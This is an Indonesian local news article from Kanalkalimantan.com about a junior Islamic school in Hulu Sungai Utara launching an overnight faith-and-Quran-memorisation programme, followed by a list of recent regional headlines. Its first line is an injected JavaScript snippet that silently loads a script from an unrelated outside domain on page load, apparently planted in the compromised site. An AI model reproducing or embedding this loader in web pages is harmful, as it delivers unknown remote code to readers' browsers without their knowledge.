(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

KANALKALIMANTAN.COM, AMUNTAI – Guna meningkatkan iman dan taqwa, keilmuan di bidang agama serta kemandirian peserta didik, Madrasah Tsanawaiyah (MTs) Negeri 2 Hulu Sungai Utara (HSU) melaksanakan program Malam Bina Iman dan Takwa (Mabit).

Berbagai kegiatan keagamaan diberikan kepada seluruh siswa pada program Mabit ini, seperti shalat fardhu berjamaah, shalat hajat, shalat tahajjud, menghafal alquran (tahfiz), taklim, pengamalan wirid dan ratib, murajaah hingga setoran hafalan.

Kepala Madrasah (Kamad) MTsN 2 HSU Siti Lamsinah berharap program Mabit ini akan berlangsung terus menerus.

“Mudah-mudahan kegiatan yang kita mulai hari ini akan benar-benar dirasakan manfaatnya baik bagi orangtua siswa maupun masyarakat,” katanya.

Baca juga: Kasus Siswa Tusuk Siswa SMAN 7 Banjarmasin, Pihak Sekolah Belum Beri Penjelasan Resmi

Lebih lanjut, dirinya bersyukur melalui kegiatan ini para pelajar benar-benar digodok seperti menjadi santri, mulai dari dididik memperbanyak keilmuan di bidang agama hingga hafalan Al Qur’an atau tahfiz.

“Kami punya cita-cita MTsN 2 Hulu Sungai Utara mempunyai pondok tahfiz yang kelak tidak hanya bermanfaat untuk orangtua siswa tetapi juga bermanfaat untuk masyarakat Hulu Sungai Utara,” imbuhnya, Senin (31/7/2023) malam.

Sementara itu, perwakilan Komite MTsN 2 HSU Bidang Keagamaan Abdul Muthalib saat membuka kegiatan di aula MTsN 2 HSU berharap program ini dapat berjalan dengan baik dan lancar.

Dengan berjalannya kegiatan, dia menyebut tahapan-tahapan program ini juga akan terus dievaluasi sehingga tujuan utama dapat sesuai dengan harapan.

Tak lupa, dirinya juga berpesan kepada para santri atau pelajar agar dapat menjalani waktu Mabit ini dengan sebaik-baiknya.

Seiring dengan itu, Sekertaris Komite Madrasah, Latifurrahman, memberikan apresiasi kepada pihak MTsN 2 HSU yang telah menginisiasi kegiatan Mabit ini.

“Kami atas nama komite mewakili orangtua siswa mengucapkan terima kasih banyak kepada pihak Madrasah Tsanawiyah Negeri 2 Hulu Sungai Utara atas inisiatif nya mengadakan kegiatan ini,” katanya.

Baca juga: Curhat Emak-emak Air PTAM Intan Banjar Tak Ngalir, Selebgram Alint ‘Ngamuk’ di Medsos

Dirinya mengakui bahwa kegiatan Mabit ini sangat besar manfaatnya bagi para pelajar, khususnya siswa MTsN 2 HSU, terutama dalam mengisi kegiatan-kegiatan yang bermanfaat di tengah tantangan kemajuan teknologi seperti sekarang ini.

Adapun dalam kegiatan Mabit ini, akan dilaksanakan secara rutin setiap hari senin sampai dengan hari kamis disetiap pekannya. Dengan pelaksanaan terpisah waktunya untuk putra dan putri dari kelas 7, kelas 8 hingga kelas 9.

Sedangkan untuk jalannya kegiatan mabit, dipusatkan di aula dan asrama MTsN 2 HSU. (Kanalkalimantan.com/dew)

Reporter : dew
Editor : bie


Risa

Recent Posts

Banjarbaru Posisi Kedua Klasemen Sementara Popda Kalsel 2024

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah cabang olahraga (cabor) unggulan membawa kontingen Kota Banjarbaru bertengger di posisi… Read More

3 jam ago

Hasnur Resmi Lamar Partai Golkar, Mencari ‘Pintu’ Koalisi Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Langkah Hasnuryadi Sulaiman untuk maju pada kontestasi Pemilihan Gubernur dan Wakil Gubernur… Read More

4 jam ago

Pasti Maju Pilwali Banjarbaru, Ovie Simpan Nama Pasangan

KANALKALIMANTAN.COM, BANJARBARU - Aditya Mufti Ariffin memastikan akan kembali berkontestasi dalam Pemilihan Kepala Daerah (Pilkada)… Read More

5 jam ago

Soal Caleg Terpilih Mundur atau Tidak Mundur Jika Maju Pilkada, Begini Penjelasan KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Anggota Komisi Pemilihan Umum (KPU) Provinsi Kalimantan Selatan (Kalsel), Fahmi Failasopa menegaskan… Read More

8 jam ago

Jalan Pangeran Suriansyah Banjarbaru Steril PKL dan Parkir Tepi Jalan

KANALKALIMANTAN.COM, BANJARBARU - Aktivitas Pedagang Kaki Lima alias PKL di sepanjang jalan Pangeran Suriansyah, Kelurahan… Read More

10 jam ago

Wapres Serahkan Motor Perpustakaan Keliling ke Pemkab HSU

KANALKALIMANTAN.COM, JAKARTA - Wakil Presiden RI, KH Ma’ruf Amin secara simbolis menyerahkan bantuan Motor Perpustakaan… Read More

11 jam ago

This website uses cookies.